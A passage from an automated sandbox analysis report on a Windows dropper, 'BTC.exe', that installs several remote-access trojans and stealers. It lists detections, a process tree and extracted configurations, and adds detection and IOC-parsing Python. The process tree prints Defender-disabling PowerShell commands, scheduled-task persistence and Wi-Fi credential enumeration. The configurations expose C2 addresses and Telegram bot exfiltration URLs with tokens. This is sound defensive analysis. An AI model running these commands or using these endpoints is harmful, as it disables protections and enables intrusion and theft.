
Windows Analysis Report
BTC.exe

Overview

General Information

Sample name: BTC.exe
Analysis ID: 1503194
MD5: f1424e5b9810a4a9c33506aa784fca89
SHA1: 4ad6287fe149832551afbcb1113db50cd133777b
SHA256: 8a3da2a07e82bf22f3cd239de861b2b8c50c9fe9ee2ba12a33564e1b5cc93fed
Tags: exe

Detection

AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected Rezlt
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected VenomRAT
Yara detected Vermin Keylogger
Yara detected WorldWind Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Creates files with lurking names (e.g. Crack.exe)
Disables Windows Defender (via service or powershell)
Disables Windows Defender Tamper protection
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Protects its processes via BreakOnTermination flag
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • BTC.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\BTC.exe" MD5: F1424E5B9810A4A9C33506AA784FCA89)
    • crack.exe (PID: 5972 cmdline: "C:\Users\user\AppData\Roaming\crack.exe" MD5: 9215015740C937980B6B53CEE5087769)
      • cmd.exe (PID: 2352 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5560 cmdline: timeout 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • Cracked.exe (PID: 5524 cmdline: "C:\Users\user\AppData\Roaming\Cracked.exe" MD5: 0DFA83A82F6418C73406D78296DE61BE)
      • cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5556 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • cmd.exe (PID: 3480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5340 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • svchost.exe (PID: 1716 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 96014694A042D8344B910BC47D79337B)
      • cmd.exe (PID: 6392 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 5024 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 8748 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • findstr.exe (PID: 8944 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8700 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 9000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 2584 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 7436 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • update.exe (PID: 1632 cmdline: "C:\Users\user\AppData\Roaming\update.exe" MD5: B8DF7316CC35A0FB6FE3A326B4283010)
      • cmd.exe (PID: 7152 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 5036 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 8800 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • findstr.exe (PID: 8892 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8872 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 5332 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 8508 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • Conhost.exe (PID: 8872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Window Security.exe (PID: 2680 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
      • schtasks.exe (PID: 5800 cmdline: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Windows Security.exe (PID: 5352 cmdline: "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
        • schtasks.exe (PID: 7060 cmdline: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5580 cmdline: "powershell" Get-MpPreference -verbose MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2292 cmdline: "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8764 cmdline: C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\* MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • Windows Defender Service Host.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" MD5: 5322A12CB24E83BFA9746FBDE06D07E7)
      • schtasks.exe (PID: 5520 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Window Security.exe (PID: 320 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
    • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7196 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • PING.EXE (PID: 616 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
      • Window Security.exe (PID: 6772 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
        • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7696 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • PING.EXE (PID: 8176 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
          • Window Security.exe (PID: 8464 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
            • cmd.exe (PID: 6432 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 2452 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
              • PING.EXE (PID: 8820 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
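The process tree above carries almost every behaviour the report flags: a dropped `svchost.exe` running from `%AppData%`, security-product-sounding file names, fourteen separate `Set-MpPreference` calls that weaken Defender, `schtasks /create ... /rl highest` pointing at user-writable paths, `netsh wlan` enumeration, and `ping -n 10 localhost` / `timeout` used as sleeps. The following Python is an added example, not Joe Sandbox output or code from the sample: it runs a small rule set over process-creation events whose pid, image and command line are copied from the tree (the last event is a constructed benign control), and produces findings comparable to the Sigma hits listed on this page (Powershell Defender Disable Scan Feature, Suspicious Schtasks From Env Var Folder, Files With System Process Name In Unsuspected Locations). Rule names and severity labels are my own.

```python
import re
from collections import Counter

# Image path of the PowerShell processes as Sysmon records it: the SysWOW64 copy,
# because the 32-bit parent ("Uses 32bit PE files") launched it via WoW64 redirection
# while the command line still says System32 (see the Sigma data on this page).
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample of (pid, image, cmdline) events copied from the process tree;
# the final entry is a benign control that does NOT come from the report.
SAMPLE_EVENTS = [
    (1716, r"C:\Users\user\AppData\Roaming\svchost.exe", r'"C:\Users\user\AppData\Roaming\svchost.exe"'),
    (2680, r"C:\Users\user\AppData\Roaming\Window Security.exe", r'"C:\Users\user\AppData\Roaming\Window Security.exe"'),
    (7140, r"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe", r'"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"'),
    (6392, r"C:\Windows\System32\cmd.exe", r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    (8700, r"C:\Windows\System32\cmd.exe", r'"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid'),
    (5556, r"C:\Windows\System32\schtasks.exe", r"""schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'"""),
    (5800, r"C:\Windows\SysWOW64\schtasks.exe", r'"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f'),
    (5520, r"C:\Windows\System32\schtasks.exe", r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"'),
    (5580, PS, r'"powershell" Get-MpPreference -verbose'),
    (7476, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true'),
    (7616, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true'),
    (7784, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force'),
    (7892, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0'),
    (5284, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2'),
    (616, r"C:\Windows\System32\PING.EXE", r"ping -n 10 localhost"),
    (5560, r"C:\Windows\System32\timeout.exe", r"timeout 4"),
    (4242, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p"),  # benign control (constructed)
]

SYSTEM_NAMES = {"svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
                "explorer.exe", "dllhost.exe", "rundll32.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"\\AppData\\|%APPDATA%|%TEMP%|\\Users\\Public\\|\\ProgramData\\", re.I)
LOOKALIKE = re.compile(r"windows?\s*(security|defender|update)|health service", re.I)
# Disable* $true, *ThreatDefaultAction 6 (= Allow), MAPSReporting 0 (cloud protection off),
# SubmitSamplesConsent 2 (never send samples): each of these weakens Defender.
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s.*?-(Disable\w+\s+\$true|\w*ThreatDefaultAction\s+6\b"
                             r"|MAPSReporting\s+0\b|SubmitSamplesConsent\s+2\b)", re.I)
WLAN_RECON = re.compile(r"netsh\s+wlan\s+show\s+(profile|networks)", re.I)
LOLBIN_SLEEP = re.compile(r"ping\s+-n\s+\d+\s+(?:localhost|127\.0\.0\.1)|\btimeout\s+\d+", re.I)
TASK_TARGET = re.compile(r"""/tr\s+['"]*([^'"]+?)['"]*(?:\s+/|\s*$)""", re.I)
TASK_NAME = re.compile(r'/tn\s+"([^"]+)"', re.I)


def triage(events):
    """Run every rule over each (pid, image, cmdline) event and return the findings."""
    findings = []
    for pid, image, cmd in events:
        name = image.rsplit("\\", 1)[-1].lower()

        def hit(rule, severity, detail):
            findings.append({"pid": pid, "rule": rule, "severity": severity, "detail": detail})

        # A system-process name running from outside C:\Windows (svchost.exe in %AppData%).
        if name in SYSTEM_NAMES and not image.lower().startswith("c:\\windows\\"):
            hit("system_name_anomaly", "high", image)
        # A security-product-sounding binary dropped into a user-writable folder.
        if LOOKALIKE.search(name) and USER_WRITABLE.search(image):
            hit("masquerade_name", "medium", image)
        if m := DEFENDER_TAMPER.search(cmd):
            hit("defender_tamper", "high", m.group(1))
        elif re.search(r"Get-MpPreference", cmd, re.I):      # reading settings before changing them
            hit("defender_recon", "low", "Get-MpPreference")
        # schtasks /create whose action (/tr) lives in a user-writable path.
        if re.search(r"schtasks.*?/create", cmd, re.I):
            target = TASK_TARGET.search(cmd)
            target = target.group(1) if target else "?"
            if USER_WRITABLE.search(target):
                task = TASK_NAME.search(cmd)
                severity = "high" if re.search(r"/rl\s+highest", cmd, re.I) else "medium"
                hit("schtasks_persist", severity, f"{task.group(1) if task else '?'} -> {target}")
        # Wi-Fi profile / BSSID enumeration; the saved keys themselves come from a
        # per-profile "show profile <name> key=clear" call that follows this listing.
        if WLAN_RECON.search(cmd):
            hit("wlan_recon", "medium", cmd)
        # ping -n N localhost / timeout N used as a sleep between stages.
        if LOLBIN_SLEEP.search(cmd):
            hit("lolbin_sleep", "low", cmd)
    return findings


def summarize(findings):
    """Count findings per rule, e.g. to rank a host during triage."""
    return Counter(f["rule"] for f in findings)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['rule']:20} pid={f['pid']:<5} {f['detail']}")
```

Run against the events from this tree the rules return sixteen findings and nothing for the control event; the benign `svchost.exe -k netsvcs` is cleared by the path check alone, which is the whole point of the "system process name in an unexpected location" rule.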
Name | Description | Attribution | Blogpost URLs | Link
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, but it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may harm the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
Cameleon, StormKitty | PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
XWorm | Malware with a wide range of capabilities ranging from RAT to ransomware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"Version": "2.1.0.0", "Host:Port": "146.190.29.250:7812;", "SubDirectory": "SubDir34", "InstallName": "Windows Security.exe", "MutexName": "VNM_MUTEX_h1gQxrpyccCFZq7JPS", "StartupKey": "Windows Update", "Tag": "Office04", "LogDirectoryName": "Logs"}
{"C2 url": ["146.190.29.250", "165.227.91.90", "167.99.94.206"], "Port": "7812", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148"}
{"Server": "185.252.232.158,64.23.232.116", "Ports": "7812", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Windows Security Health Service.exe", "AES_key": "U7UKNtJ34LgchwZODOfzzFcHW2nq5BGM", "Mutex": "vsvf", "Certificate": "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", "ServerSignature": "MB7+7eQe3o/mr34a8NEaPDlYEbTJe3GITCSUNhGbTCbTlGn/dXnmzv6/FdZSuAlv0XJWcYHF/Q7TuCeusJI910cY/I6m4fHm3HdMCvzVYKl83ynyD0SsNszljpqC1g/jNVcnhSAOQSUOWT6s3TKuQxwrW62ZBFDfFXrylSK+fdM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "true", "AntiVM": "false"}
{"C2 url": "https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 310366, "from": {"id": 5904946097, "is_bot": true, "first_name": "Vilva789", "username": "Vilva814bot"}, "chat": {"id": 5881759996, "first_name": "BTC USDT", "last_name": "FLASH\ud83d\udd25", "username": "flashusdtbtcsender", "type": "private"}, "date": 1725336958, "text": "This Not RDP"}}]}
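The configurations above come from four different family extractors and encode the same kind of information three different ways: an AsyncRAT-style `"Host:Port": "ip:port;"` string, XWorm's `"C2 url"` list plus a separate `"Port"`, and VenomRAT's comma-separated `"Server"` plus `"Ports"`. The Telegram exfiltration channel hides in URLs (`bot<id>:<token>` with an optional `chat_id` query) and in the captured `sendMessage` reply, whose `result.chat.id` is the operator's chat even when the URL itself carries no `chat_id`. The following Python is an added example, not part of the report or of Joe Sandbox: it normalises the four configs (embedded as constructed input, with the VenomRAT certificate and the AES keys omitted) into one de-duplicated IOC set. It assumes only the key names shown in the JSON above.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed input: the configurations extracted in this report, trimmed to the
# fields used below (certificate and AES keys left out, nothing added).
CONFIGS = [
    {"Version": "2.1.0.0", "Host:Port": "146.190.29.250:7812;", "SubDirectory": "SubDir34",
     "InstallName": "Windows Security.exe", "MutexName": "VNM_MUTEX_h1gQxrpyccCFZq7JPS",
     "StartupKey": "Windows Update", "Tag": "Office04"},
    {"C2 url": ["146.190.29.250", "165.227.91.90", "167.99.94.206"], "Port": "7812",
     "Install file": "USB.exe", "Version": "XWorm V5.2",
     "Telegram URL": "https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148"},
    {"Server": "185.252.232.158,64.23.232.116", "Ports": "7812",
     "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3",
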